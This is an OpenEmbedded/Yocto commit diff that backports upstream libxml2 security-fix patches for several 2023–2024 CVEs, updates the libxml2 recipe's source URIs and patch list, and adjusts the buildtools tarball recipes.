++ <xs:complexType name="BaseType">
++ <xs:simpleContent>
++ <xs:extension base="xs:int" />
++ </xs:simpleContent>
++ </xs:complexType>
++ <xs:complexType name="ChildType">
++ <xs:complexContent>
++ <xs:extension base="BaseType">
++ <xs:sequence>
++ <xs:element name="bad" type="xs:int" minOccurs="0" maxOccurs="1"/>
++ </xs:sequence>
++ </xs:extension>
++ </xs:complexContent>
++ </xs:complexType>
++ <xs:element name="Child" type="ChildType" />
++</xs:schema>
+diff --git a/xmlschemas.c b/xmlschemas.c
+index 6a353858..a4eaf591 100644
+--- a/xmlschemas.c
++++ b/xmlschemas.c
+@@ -18632,7 +18632,7 @@ xmlSchemaFixupComplexType(xmlSchemaParserCtxtPtr pctxt,
+ "allowed to appear inside other model groups",
+ NULL, NULL);
+
+- } else if (! dummySequence) {
++ } else if ((!dummySequence) && (baseType->subtypes != NULL)) {
+ xmlSchemaTreeItemPtr effectiveContent =
+ (xmlSchemaTreeItemPtr) type->subtypes;
+ /*
+--
+GitLab
+
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2023-29469.patch b/meta/recipes-core/libxml/libxml2/CVE-2023-29469.patch
new file mode 100644
index 0000000000..1252668577
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2023-29469.patch
@@ -0,0 +1,42 @@
+From 547edbf1cbdccd46b2e8ff322a456eaa5931c5df Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Fri, 7 Apr 2023 11:49:27 +0200
+Subject: [PATCH] [CVE-2023-29469] Hashing of empty dict strings isn't
+ deterministic
+
+When hashing empty strings which aren't null-terminated,
+xmlDictComputeFastKey could produce inconsistent results. This could
+lead to various logic or memory errors, including double frees.
+
+For consistency the seed is also taken into account, but this shouldn't
+have an impact on security.
+
+Found by OSS-Fuzz.
+
+Fixes #510.
+
+CVE: CVE-2023-29469
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/547edbf1cbdccd46b2e8ff322a456eaa5931c5df]
+
+Signed-off-by: Peter Marko <peter.marko@siemens.com>
+---
+ dict.c | 3 ++-
+ 1 file changed, 2 insertions(+), 1 deletion(-)
+
+diff --git a/dict.c b/dict.c
+index 86c3f6d7..d7fd1a06 100644
+--- a/dict.c
++++ b/dict.c
+@@ -451,7 +451,8 @@ static unsigned long
+ xmlDictComputeFastKey(const xmlChar *name, int namelen, int seed) {
+ unsigned long value = seed;
+
+- if (name == NULL) return(0);
++ if ((name == NULL) || (namelen <= 0))
++ return(value);
+ value = *name;
+ value <<= 5;
+ if (namelen > 10) {
+--
+GitLab
+
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2023-39615-0001.patch b/meta/recipes-core/libxml/libxml2/CVE-2023-39615-0001.patch
new file mode 100644
index 0000000000..9689cec67d
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2023-39615-0001.patch
@@ -0,0 +1,36 @@
+From d0c3f01e110d54415611c5fa0040cdf4a56053f9 Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Sat, 6 May 2023 17:47:37 +0200
+Subject: [PATCH] parser: Fix old SAX1 parser with custom callbacks
+
+For some reason, xmlCtxtUseOptionsInternal set the start and end element
+SAX handlers to the internal DOM builder functions when XML_PARSE_SAX1
+was specified. This means that custom SAX handlers could never work with
+that flag because these functions would receive the wrong user data
+argument and crash immediately.
+
+Fixes #535.
+
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/libxml2/-/commit/d0c3f01e110d54415611c5fa0040cdf4a56053f9]
+CVE: CVE-2023-39615
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ parser.c | 2 --
+ 1 file changed, 2 deletions(-)
+
+diff --git a/parser.c b/parser.c
+index 6e09208..7814e6e 100644
+--- a/parser.c
++++ b/parser.c
+@@ -15156,8 +15156,6 @@ xmlCtxtUseOptionsInternal(xmlParserCtxtPtr ctxt, int options, const char *encodi
+ }
+ #ifdef LIBXML_SAX1_ENABLED
+ if (options & XML_PARSE_SAX1) {
+- ctxt->sax->startElement = xmlSAX2StartElement;
+- ctxt->sax->endElement = xmlSAX2EndElement;
+ ctxt->sax->startElementNs = NULL;
+ ctxt->sax->endElementNs = NULL;
+ ctxt->sax->initialized = 1;
+--
+2.24.4
+
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2023-39615-0002.patch b/meta/recipes-core/libxml/libxml2/CVE-2023-39615-0002.patch
new file mode 100644
index 0000000000..ebd9868fac
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2023-39615-0002.patch
@@ -0,0 +1,71 @@
+From 235b15a590eecf97b09e87bdb7e4f8333e9de129 Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Mon, 8 May 2023 17:58:02 +0200
+Subject: [PATCH] SAX: Always initialize SAX1 element handlers
+
+Follow-up to commit d0c3f01e. A parser context will be initialized to
+SAX version 2, but this can be overridden with XML_PARSE_SAX1 later,
+so we must initialize the SAX1 element handlers as well.
+
+Change the check in xmlDetectSAX2 to only look for XML_SAX2_MAGIC, so
+we don't switch to SAX1 if the SAX2 element handlers are NULL.
+
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/libxml2/-/commit/235b15a590eecf97b09e87bdb7e4f8333e9de129]
+CVE: CVE-2023-39615
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ SAX2.c | 11 +++++++----
+ parser.c | 5 +----
+ 2 files changed, 8 insertions(+), 8 deletions(-)
+
+diff --git a/SAX2.c b/SAX2.c
+index 5f141f9..902d34d 100644
+--- a/SAX2.c
++++ b/SAX2.c
+@@ -2869,20 +2869,23 @@ xmlSAXVersion(xmlSAXHandler *hdlr, int version)
+ {
+ if (hdlr == NULL) return(-1);
+ if (version == 2) {
+- hdlr->startElement = NULL;
+- hdlr->endElement = NULL;
+ hdlr->startElementNs = xmlSAX2StartElementNs;
+ hdlr->endElementNs = xmlSAX2EndElementNs;
+ hdlr->serror = NULL;
+ hdlr->initialized = XML_SAX2_MAGIC;
+ #ifdef LIBXML_SAX1_ENABLED
+ } else if (version == 1) {
+- hdlr->startElement = xmlSAX2StartElement;
+- hdlr->endElement = xmlSAX2EndElement;
+ hdlr->initialized = 1;
+ #endif /* LIBXML_SAX1_ENABLED */
+ } else
+ return(-1);
++#ifdef LIBXML_SAX1_ENABLED
++ hdlr->startElement = xmlSAX2StartElement;
++ hdlr->endElement = xmlSAX2EndElement;
++#else
++ hdlr->startElement = NULL;
++ hdlr->endElement = NULL;
++#endif /* LIBXML_SAX1_ENABLED */
+ hdlr->internalSubset = xmlSAX2InternalSubset;
+ hdlr->externalSubset = xmlSAX2ExternalSubset;
+ hdlr->isStandalone = xmlSAX2IsStandalone;
+diff --git a/parser.c b/parser.c
+index 7814e6e..cf0fb38 100644
+--- a/parser.c
++++ b/parser.c
+@@ -1102,10 +1102,7 @@ xmlDetectSAX2(xmlParserCtxtPtr ctxt) {
+ if (ctxt == NULL) return;
+ sax = ctxt->sax;
+ #ifdef LIBXML_SAX1_ENABLED
+- if ((sax) && (sax->initialized == XML_SAX2_MAGIC) &&
+- ((sax->startElementNs != NULL) ||
+- (sax->endElementNs != NULL) ||
+- ((sax->startElement == NULL) && (sax->endElement == NULL))))
++ if ((sax) && (sax->initialized == XML_SAX2_MAGIC))
+ ctxt->sax2 = 1;
+ #else
+ ctxt->sax2 = 1;
+--
+2.24.4
+
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2023-39615-pre.patch b/meta/recipes-core/libxml/libxml2/CVE-2023-39615-pre.patch
new file mode 100644
index 0000000000..b177cdaba0
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2023-39615-pre.patch
@@ -0,0 +1,44 @@
+From 99fc048d7f7292c5ee18e44c400bd73bc63a47ed Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Fri, 14 Aug 2020 14:18:50 +0200
+Subject: [PATCH] Don't use SAX1 if all element handlers are NULL
+
+Running xmllint with "--sax --noout" installs a SAX2 handler with all
+callbacks set to NULL. In this case or similar situations, we don't want
+to switch to SAX1 parsing.
+
+Note: This patch is needed for the "CVE-2023-39615-0002" patch to apply.
+Without this patch the build will fail with an undefined sax error.
+
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/libxml2/-/commit/99fc048d7f7292c5ee18e44c400bd73bc63a47ed]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ parser.c | 10 +++++++---
+ 1 file changed, 7 insertions(+), 3 deletions(-)
+
+diff --git a/parser.c b/parser.c
+index bb677b0..6e09208 100644
+--- a/parser.c
++++ b/parser.c
+@@ -1098,11 +1098,15 @@ xmlHasFeature(xmlFeature feature)
+ */
+ static void
+ xmlDetectSAX2(xmlParserCtxtPtr ctxt) {
++ xmlSAXHandlerPtr sax;
+ if (ctxt == NULL) return;
++ sax = ctxt->sax;
+ #ifdef LIBXML_SAX1_ENABLED
+- if ((ctxt->sax) && (ctxt->sax->initialized == XML_SAX2_MAGIC) &&
+- ((ctxt->sax->startElementNs != NULL) ||
+- (ctxt->sax->endElementNs != NULL))) ctxt->sax2 = 1;
++ if ((sax) && (sax->initialized == XML_SAX2_MAGIC) &&
++ ((sax->startElementNs != NULL) ||
++ (sax->endElementNs != NULL) ||
++ ((sax->startElement == NULL) && (sax->endElement == NULL))))
++ ctxt->sax2 = 1;
+ #else
+ ctxt->sax2 = 1;
+ #endif /* LIBXML_SAX1_ENABLED */
+--
+2.24.4
+
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2023-45322-1.patch b/meta/recipes-core/libxml/libxml2/CVE-2023-45322-1.patch
new file mode 100644
index 0000000000..182bb29abd
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2023-45322-1.patch
@@ -0,0 +1,50 @@
+From a22bd982bf10291deea8ba0c61bf75b898c604ce Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Wed, 2 Nov 2022 15:44:42 +0100
+Subject: [PATCH] malloc-fail: Fix memory leak in xmlStaticCopyNodeList
+
+Found with libFuzzer, see #344.
+
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/a22bd982bf10291deea8ba0c61bf75b898c604ce]
+
+Signed-off-by: Peter Marko <peter.marko@siemens.com>
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ tree.c | 7 +++++--
+ 1 file changed, 5 insertions(+), 2 deletions(-)
+
+diff --git a/tree.c b/tree.c
+index 507869efe..647288ce3 100644
+--- a/tree.c
++++ b/tree.c
+@@ -4461,7 +4461,7 @@ xmlStaticCopyNodeList(xmlNodePtr node, xmlDocPtr doc, xmlNodePtr parent) {
+ }
+ if (doc->intSubset == NULL) {
+ q = (xmlNodePtr) xmlCopyDtd( (xmlDtdPtr) node );
+- if (q == NULL) return(NULL);
++ if (q == NULL) goto error;
+ q->doc = doc;
+ q->parent = parent;
+ doc->intSubset = (xmlDtdPtr) q;
+@@ -4473,7 +4473,7 @@ xmlStaticCopyNodeList(xmlNodePtr node, xmlDocPtr doc, xmlNodePtr parent) {
+ } else
+ #endif /* LIBXML_TREE_ENABLED */
+ q = xmlStaticCopyNode(node, doc, parent, 1);
+- if (q == NULL) return(NULL);
++ if (q == NULL) goto error;
+ if (ret == NULL) {
+ q->prev = NULL;
+ ret = p = q;
+@@ -4486,6 +4486,9 @@ xmlStaticCopyNodeList(xmlNodePtr node, xmlDocPtr doc, xmlNodePtr parent) {
+ node = node->next;
+ }
+ return(ret);
++error:
++ xmlFreeNodeList(ret);
++ return(NULL);
+ }
+
+ /**
+--
+GitLab
+
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2023-45322-2.patch b/meta/recipes-core/libxml/libxml2/CVE-2023-45322-2.patch
new file mode 100644
index 0000000000..c7e9681e6a
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2023-45322-2.patch
@@ -0,0 +1,80 @@
+From d39f78069dff496ec865c73aa44d7110e429bce9 Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Wed, 23 Aug 2023 20:24:24 +0200
+Subject: [PATCH] tree: Fix copying of DTDs
+
+- Don't create multiple DTD nodes.
+- Fix UAF if malloc fails.
+- Skip DTD nodes if tree module is disabled.
+
+Fixes #583.
+
+CVE: CVE-2023-45322
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/d39f78069dff496ec865c73aa44d7110e429bce9]
+
+Signed-off-by: Peter Marko <peter.marko@siemens.com>
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ tree.c | 31 ++++++++++++++++---------------
+ 1 file changed, 16 insertions(+), 15 deletions(-)
+
+diff --git a/tree.c b/tree.c
+index 6c8a875b9..02c1b5791 100644
+--- a/tree.c
++++ b/tree.c
+@@ -4471,29 +4471,28 @@ xmlNodePtr
+ xmlStaticCopyNodeList(xmlNodePtr node, xmlDocPtr doc, xmlNodePtr parent) {
+ xmlNodePtr ret = NULL;
+ xmlNodePtr p = NULL,q;
++ xmlDtdPtr newSubset = NULL;
+
+ while (node != NULL) {
+-#ifdef LIBXML_TREE_ENABLED
+ if (node->type == XML_DTD_NODE ) {
+- if (doc == NULL) {
++#ifdef LIBXML_TREE_ENABLED
++ if ((doc == NULL) || (doc->intSubset != NULL)) {
+ node = node->next;
+ continue;
+ }
+- if (doc->intSubset == NULL) {
+- q = (xmlNodePtr) xmlCopyDtd( (xmlDtdPtr) node );
+- if (q == NULL) goto error;
+- q->doc = doc;
+- q->parent = parent;
+- doc->intSubset = (xmlDtdPtr) q;
+- xmlAddChild(parent, q);
+- } else {
+- q = (xmlNodePtr) doc->intSubset;
+- xmlAddChild(parent, q);
+- }
+- } else
++ q = (xmlNodePtr) xmlCopyDtd( (xmlDtdPtr) node );
++ if (q == NULL) goto error;
++ q->doc = doc;
++ q->parent = parent;
++ newSubset = (xmlDtdPtr) q;
++#else
++ node = node->next;
++ continue;
+ #endif /* LIBXML_TREE_ENABLED */
++ } else {
+ q = xmlStaticCopyNode(node, doc, parent, 1);
+- if (q == NULL) goto error;
++ if (q == NULL) goto error;
++ }
+ if (ret == NULL) {
+ q->prev = NULL;
+ ret = p = q;
+@@ -4505,6 +4504,8 @@ xmlStaticCopyNodeList(xmlNodePtr node, xmlDocPtr doc, xmlNodePtr parent) {
+ }
+ node = node->next;
+ }
++ if (newSubset != NULL)
++ doc->intSubset = newSubset;
+ return(ret);
+ error:
+ xmlFreeNodeList(ret);
+--
+GitLab
+
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2024-25062-pre1.patch b/meta/recipes-core/libxml/libxml2/CVE-2024-25062-pre1.patch
new file mode 100644
index 0000000000..31183399f8
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2024-25062-pre1.patch
@@ -0,0 +1,38 @@
+From 31c6ce3b63f8a494ad9e31ca65187a73d8ad3508 Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Mon, 9 Nov 2020 17:55:44 +0100
+Subject: [PATCH] Avoid call stack overflow with XML reader and recursive
+ XIncludes
+
+Don't process XIncludes in the result of another inclusion to avoid
+infinite recursion resulting in a call stack overflow.
+
+This is something the XInclude engine shouldn't allow but correct
+handling of intra-document includes would require major changes.
+
+Found by OSS-Fuzz.
+
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/31c6ce3b63f8a494ad9e31ca65187a73d8ad3508]
+CVE: CVE-2024-25062 #Dependency Patch
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ xmlreader.c | 3 ++-
+ 1 file changed, 2 insertions(+), 1 deletion(-)
+
+diff --git a/xmlreader.c b/xmlreader.c
+index 01adf74f4..72e40b032 100644
+--- a/xmlreader.c
++++ b/xmlreader.c
+@@ -1585,7 +1585,8 @@ node_found:
+ /*
+ * Handle XInclude if asked for
+ */
+- if ((reader->xinclude) && (reader->node != NULL) &&
++ if ((reader->xinclude) && (reader->in_xinclude == 0) &&
++ (reader->node != NULL) &&
+ (reader->node->type == XML_ELEMENT_NODE) &&
+ (reader->node->ns != NULL) &&
+ ((xmlStrEqual(reader->node->ns->href, XINCLUDE_NS)) ||
+--
+GitLab
+
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2024-25062.patch b/meta/recipes-core/libxml/libxml2/CVE-2024-25062.patch
new file mode 100644
index 0000000000..5365d5546a
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2024-25062.patch
@@ -0,0 +1,33 @@
+From 2b0aac140d739905c7848a42efc60bfe783a39b7 Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Sat, 14 Oct 2023 22:45:54 +0200
+Subject: [PATCH] [CVE-2024-25062] xmlreader: Don't expand XIncludes when
+ backtracking
+
+Fixes a use-after-free when the XML Reader is used with DTD validation and
+XInclude expansion.
+
+Fixes #604.
+
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/2b0aac140d739905c7848a42efc60bfe783a39b7]
+CVE: CVE-2024-25062
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ xmlreader.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/xmlreader.c b/xmlreader.c
+index 979385a13..fefd68e0b 100644
+--- a/xmlreader.c
++++ b/xmlreader.c
+@@ -1443,6 +1443,7 @@ node_found:
+ * Handle XInclude if asked for
+ */
+ if ((reader->xinclude) && (reader->in_xinclude == 0) &&
++ (reader->state != XML_TEXTREADER_BACKTRACK) &&
+ (reader->node != NULL) &&
+ (reader->node->type == XML_ELEMENT_NODE) &&
+ (reader->node->ns != NULL) &&
+--
+GitLab
+
diff --git a/meta/recipes-core/libxml/libxml2/runtest.patch b/meta/recipes-core/libxml/libxml2/runtest.patch
index 0dbb353c0f..c7a90cd3dc 100644
--- a/meta/recipes-core/libxml/libxml2/runtest.patch
+++ b/meta/recipes-core/libxml/libxml2/runtest.patch
@@ -1,28 +1,33 @@
-Add 'install-ptest' rule. Print a standard result line for
-each test.
+From 6172ccd1e74bc181f5298f19e240234e12876abe Mon Sep 17 00:00:00 2001
+From: Tony Tascioglu <tony.tascioglu@windriver.com>
+Date: Tue, 11 May 2021 11:57:46 -0400
+Subject: [PATCH] Add 'install-ptest' rule.
+
+Print a standard result line for each test.
Signed-off-by: Mihaela Sendrea <mihaela.sendrea@enea.com>
Signed-off-by: Andrej Valek <andrej.valek@siemens.com>
-Upstream-Status: Backport
+Upstream-Status: Pending
Signed-off-by: Hongxu Jia <hongxu.jia@windriver.com>
+Signed-off-by: Tony Tascioglu <tony.tascioglu@windriver.com>
---
- Makefile.am | 9 ++++
+ Makefile.am | 9 +++
runsuite.c | 1 +
runtest.c | 2 +
runxmlconf.c | 1 +
- testapi.c | 122 ++++++++++++++++++++++++++++++---------------
- testchar.c | 156 +++++++++++++++++++++++++++++++++++++++++-----------------
+ testapi.c | 122 ++++++++++++++++++++++++++-------------
+ testchar.c | 156 +++++++++++++++++++++++++++++++++++---------------
testdict.c | 1 +
testlimits.c | 1 +
testrecurse.c | 2 +
9 files changed, 210 insertions(+), 85 deletions(-)
diff --git a/Makefile.am b/Makefile.am
-index 9c630be..7cfd04b 100644
+index 05d1671f..ae622745 100644
--- a/Makefile.am
+++ b/Makefile.am
-@@ -202,6 +202,15 @@ runxmlconf_LDADD= $(LDADDS)
+@@ -198,6 +198,15 @@ runxmlconf_LDADD= $(LDADDS)
#testOOM_DEPENDENCIES = $(DEPS)
#testOOM_LDADD= $(LDADDS)
@@ -39,10 +44,10 @@ index 9c630be..7cfd04b 100644
testchar$(EXEEXT) testdict$(EXEEXT) runxmlconf$(EXEEXT)
[ -d test ] || $(LN_S) $(srcdir)/test .
diff --git a/runsuite.c b/runsuite.c
-index aaab13e..9ba2c5d 100644
+index d24b5ec3..f7ff2521 100644
--- a/runsuite.c
+++ b/runsuite.c
-@@ -1162,6 +1162,7 @@ main(int argc ATTRIBUTE_UNUSED, char **argv ATTRIBUTE_UNUSED) {
+@@ -1147,6 +1147,7 @@ main(int argc ATTRIBUTE_UNUSED, char **argv ATTRIBUTE_UNUSED) {
if (logfile != NULL)
fclose(logfile);
@@ -51,10 +56,10 @@ index aaab13e..9ba2c5d 100644
}
#else /* !SCHEMAS */
diff --git a/runtest.c b/runtest.c
-index addda5c..8ba5d59 100644
+index ffa98d04..470f95cb 100644
--- a/runtest.c
+++ b/runtest.c
-@@ -4501,6 +4501,7 @@ launchTests(testDescPtr tst) {
+@@ -4508,6 +4508,7 @@ launchTests(testDescPtr tst) {
xmlCharEncCloseFunc(ebcdicHandler);
xmlCharEncCloseFunc(eucJpHandler);
@@ -62,7 +67,7 @@ index addda5c..8ba5d59 100644
return(err);
}
-@@ -4577,6 +4578,7 @@ main(int argc ATTRIBUTE_UNUSED, char **argv ATTRIBUTE_UNUSED) {
+@@ -4588,6 +4589,7 @@ main(int argc ATTRIBUTE_UNUSED, char **argv ATTRIBUTE_UNUSED) {
xmlCleanupParser();
xmlMemoryDump();
@@ -71,7 +76,7 @@ index addda5c..8ba5d59 100644
}
diff --git a/runxmlconf.c b/runxmlconf.c
-index cef20f4..4f291fb 100644
+index 70f61017..e882b3a1 100644
--- a/runxmlconf.c
+++ b/runxmlconf.c
@@ -595,6 +595,7 @@ main(int argc ATTRIBUTE_UNUSED, char **argv ATTRIBUTE_UNUSED) {
@@ -83,7 +88,7 @@ index cef20f4..4f291fb 100644
}
diff --git a/testapi.c b/testapi.c
-index 4a751e2..7ccc066 100644
+index ff8b470d..52b51d78 100644
--- a/testapi.c
+++ b/testapi.c
@@ -1246,49 +1246,91 @@ static int
@@ -219,7 +224,7 @@ index 4a751e2..7ccc066 100644
}
diff --git a/testchar.c b/testchar.c
-index 0d08792..f555d3b 100644
+index 6866a175..7bce0132 100644
--- a/testchar.c
+++ b/testchar.c
@@ -23,7 +23,7 @@ static void errorHandler(void *unused, xmlErrorPtr err) {
@@ -797,7 +802,7 @@ index 0d08792..f555d3b 100644
/*
* Cleanup function for the XML library.
diff --git a/testdict.c b/testdict.c
-index 40bebd0..114b934 100644
+index 40bebd05..114b9347 100644
--- a/testdict.c
+++ b/testdict.c
@@ -440,5 +440,6 @@ int main(void)
@@ -808,7 +813,7 @@ index 40bebd0..114b934 100644
return(ret);
}
diff --git a/testlimits.c b/testlimits.c
-index 68c94db..1584434 100644
+index 059116a6..f0bee68d 100644
--- a/testlimits.c
+++ b/testlimits.c
@@ -1634,5 +1634,6 @@ main(int argc ATTRIBUTE_UNUSED, char **argv ATTRIBUTE_UNUSED) {
@@ -819,7 +824,7 @@ index 68c94db..1584434 100644
return(ret);
}
diff --git a/testrecurse.c b/testrecurse.c
-index f95ae1c..74c8f8b 100644
+index 0cbe25a6..3ecadb40 100644
--- a/testrecurse.c
+++ b/testrecurse.c
@@ -892,6 +892,7 @@ launchTests(testDescPtr tst) {
@@ -838,5 +843,5 @@ index f95ae1c..74c8f8b 100644
return(ret);
}
--
-2.7.4
+2.25.1
diff --git a/meta/recipes-core/libxml/libxml2_2.9.10.bb b/meta/recipes-core/libxml/libxml2_2.9.10.bb
index 4ebfb9e556..72f830b6d3 100644
--- a/meta/recipes-core/libxml/libxml2_2.9.10.bb
+++ b/meta/recipes-core/libxml/libxml2_2.9.10.bb
@@ -1,6 +1,6 @@
SUMMARY = "XML C Parser Library and Toolkit"
DESCRIPTION = "The XML Parser Library allows for manipulation of XML files. Libxml2 exports Push and Pull type parser interfaces for both XML and HTML. It can do DTD validation at parse time, on a parsed document instance or with an arbitrary DTD. Libxml2 includes complete XPath, XPointer and Xinclude implementations. It also has a SAX like interface, which is designed to be compatible with Expat."
-HOMEPAGE = "http://www.xmlsoft.org/"
+HOMEPAGE = "https://gitlab.gnome.org/GNOME/libxml2"
BUGTRACKER = "http://bugzilla.gnome.org/buglist.cgi?product=libxml2"
SECTION = "libs"
LICENSE = "MIT"
@@ -11,8 +11,9 @@ LIC_FILES_CHKSUM = "file://Copyright;md5=2044417e2e5006b65a8b9067b683fcf1 \
DEPENDS = "zlib virtual/libiconv"
-SRC_URI = "http://www.xmlsoft.org/sources/libxml2-${PV}.tar.gz;name=libtar \
- http://www.w3.org/XML/Test/xmlts20080827.tar.gz;subdir=${BP};name=testtar \
+inherit gnomebase
+
+SRC_URI += "http://www.w3.org/XML/Test/xmlts20080827.tar.gz;subdir=${BP};name=testtar \
file://libxml-64bit.patch \
file://runtest.patch \
file://run-ptest \
@@ -23,10 +24,31 @@ SRC_URI = "http://www.xmlsoft.org/sources/libxml2-${PV}.tar.gz;name=libtar \
file://CVE-2020-7595.patch \
file://CVE-2019-20388.patch \
file://CVE-2020-24977.patch \
+ file://CVE-2021-3517.patch \
+ file://CVE-2021-3537.patch \
+ file://CVE-2021-3518.patch \
+ file://CVE-2021-3541.patch \
+ file://CVE-2022-23308.patch \
+ file://CVE-2022-23308-fix-regression.patch \
+ file://CVE-2022-29824-dependent.patch \
+ file://CVE-2022-29824.patch \
+ file://0001-Port-gentest.py-to-Python-3.patch \
+ file://CVE-2016-3709.patch \
+ file://CVE-2022-40303.patch \
+ file://CVE-2022-40304.patch \
+ file://CVE-2023-28484.patch \
+ file://CVE-2023-29469.patch \
+ file://CVE-2023-39615-pre.patch \
+ file://CVE-2023-39615-0001.patch \
+ file://CVE-2023-39615-0002.patch \
+ file://CVE-2021-3516.patch \
+ file://CVE-2023-45322-1.patch \
+ file://CVE-2023-45322-2.patch \
+ file://CVE-2024-25062-pre1.patch \
+ file://CVE-2024-25062.patch \
"
-SRC_URI[libtar.md5sum] = "10942a1dc23137a8aa07f0639cbfece5"
-SRC_URI[libtar.sha256sum] = "aafee193ffb8fe0c82d4afef6ef91972cbaf5feea100edc2f262750611b4be1f"
+SRC_URI[archive.sha256sum] = "593b7b751dd18c2d6abcd0c4bcb29efc203d0b4373a6df98e3a455ea74ae2813"
SRC_URI[testtar.md5sum] = "ae3d1ebe000a3972afa104ca7f0e1b4a"
SRC_URI[testtar.sha256sum] = "96151685cec997e1f9f3387e3626d61e6284d4d6e66e0e440c209286c03e9cc7"
@@ -40,9 +62,9 @@ PACKAGECONFIG[ipv6] = "--enable-ipv6,--disable-ipv6,"
inherit autotools pkgconfig binconfig-disabled ptest features_check
-inherit ${@bb.utils.contains('PACKAGECONFIG', 'python', 'python3native', '', d)}
+inherit ${@bb.utils.contains('PACKAGECONFIG', 'python', 'python3targetconfig', '', d)}
-RDEPENDS_${PN}-ptest += "make ${@bb.utils.contains('PACKAGECONFIG', 'python', 'libgcc python3-core python3-logging python3-shell python3-stringold python3-threading python3-unittest ${PN}-python', '', d)}"
+RDEPENDS_${PN}-ptest += "bash make ${@bb.utils.contains('PACKAGECONFIG', 'python', 'libgcc python3-core python3-logging python3-shell python3-stringold python3-threading python3-unittest ${PN}-python', '', d)}"
RDEPENDS_${PN}-python += "${@bb.utils.contains('PACKAGECONFIG', 'python', 'python3-core', '', d)}"
@@ -81,6 +103,16 @@ do_configure_prepend () {
}
do_compile_ptest() {
+ # Make sure that testapi.c is newer than gentests.py, because
+ # with reproducible builds, they will both get e.g. Jan 1 1970
+ # modification time from SOURCE_DATE_EPOCH and then check-am
+ # might try to rebuild_testapi, which will fail even with
+ # 0001-Port-gentest.py-to-Python-3.patch, because it needs the
+ # libxml2 module (libxml2-native dependency and a correctly
+ # set PYTHON_SITE_PACKAGES). It's easier to
+ # just rely on the pre-generated testapi.c from the release
+ touch ${S}/testapi.c
+
oe_runmake check-am
}
diff --git a/meta/recipes-core/meta/buildtools-extended-tarball.bb b/meta/recipes-core/meta/buildtools-extended-tarball.bb
index c32d0107c3..83e3fddccc 100644
--- a/meta/recipes-core/meta/buildtools-extended-tarball.bb
+++ b/meta/recipes-core/meta/buildtools-extended-tarball.bb
@@ -28,8 +28,21 @@ TOOLCHAIN_HOST_TASK += "\
nativesdk-libtool \
nativesdk-pkgconfig \
nativesdk-glibc-utils \
+ nativesdk-glibc-gconv-ibm850 \
+ nativesdk-glibc-gconv-iso8859-1 \
+ nativesdk-glibc-gconv-utf-16 \
+ nativesdk-glibc-gconv-cp1250 \
+ nativesdk-glibc-gconv-cp1251 \
+ nativesdk-glibc-gconv-cp1252 \
+ nativesdk-glibc-gconv-euc-jp \
+ nativesdk-glibc-gconv-libjis \
nativesdk-libxcrypt-dev \
+ nativesdk-parted \
+ nativesdk-dosfstools \
+ nativesdk-gptfdisk \
"
+# gconv-cp1250, cp1251 and euc-jp are needed for iconv to work in vim builds;
+# the list is also copied from uninative
TOOLCHAIN_OUTPUTNAME = "${SDK_ARCH}-buildtools-extended-nativesdk-standalone-${DISTRO_VERSION}"
diff --git a/meta/recipes-core/meta/buildtools-tarball.bb b/meta/recipes-core/meta/buildtools-tarball.bb
index 434ffdc334..24f5f28589 100644
--- a/meta/recipes-core/meta/buildtools-tarball.bb
+++ b/meta/recipes-core/meta/buildtools-tarball.bb
@@ -66,7 +66,7 @@ create_sdk_files_append () {
# Generate new (mini) sdk-environment-setup file
script=${1:-${SDK_OUTPUT}/${SDKPATH}/environment-setup-${SDK_SYS}}
touch $script
- echo 'export PATH=${SDKPATHNATIVE}${bindir_nativesdk}:$PATH' >> $script
+ echo 'export PATH="${SDKPATHNATIVE}${bindir_nativesdk}:${SDKPATHNATIVE}${sbindir_nativesdk}:${SDKPATHNATIVE}${base_bindir_nativesdk}:${SDKPATHNATIVE}${base_sbindir_nativesdk}:$PATH"' >> $script
